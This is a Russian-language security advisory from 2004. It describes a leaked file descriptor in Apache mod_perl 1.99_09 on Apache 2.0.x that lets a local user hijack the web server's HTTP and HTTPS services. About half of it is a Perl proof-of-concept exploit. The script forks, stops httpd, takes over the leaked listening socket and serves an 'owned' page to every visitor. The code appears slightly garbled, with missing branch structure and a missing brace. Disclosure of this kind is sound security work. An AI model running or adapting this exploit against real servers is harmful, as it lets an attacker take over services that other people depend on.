| Дата публикации: | 23.01.2004 |
| Всего просмотров: | 1763 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Apache mod_perl 1.99_09; Tested on Apache 2.0.47
Описание: Уязвимость обнаружена в mod_perl для Apache web сервера. Локальный пользователь может внедриться в Apache http и https службы. Обнаружена утечка критичкских файловых дескрипторов в mod_perl на Apache 2.0.x В результате локальный пользователь может создать Perl CGI приложение, которое возьмет под контроль уязвимые службы. Пример/Эксплоит:
#!/usr/bin/perl
use POSIX qw(setsid);
if (!defined(my $pid = fork)) {
print "Content-Type: text/html\n\n";
print "cannot fork: $!";
exit 1;
} elsif ($pid) { # This is the parent
sleep(1);
print "Content-Type: text/html\n\n";
print "<html><body>Exploit installed</body></html>";
system '/usr/sbin/httpd2 -k stop';
sleep(2);
exit 0;
# This is the Child
setsid;
sleep(2);
my $leak = 4;
open(Server, "+<&$leak");
while (1) {
my $rin = '';
vec($rin,fileno(Server),1) = 1;
$nfound = select($rout = $rin, undef, undef, undef);
if (accept(Client,Server) ) {
print Client "HTTP/1.0 200 OK\n";
print Client "Content-Length: 40\n";
print Client "Content-Type: text/html\n\n";
print Client "<html><body>";
print Client "You're owned.";
print Client "</body></html>";
close Client;
}
URL производителя:http://perl.apache.org Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Hijacking Apache 2 via mod_perl |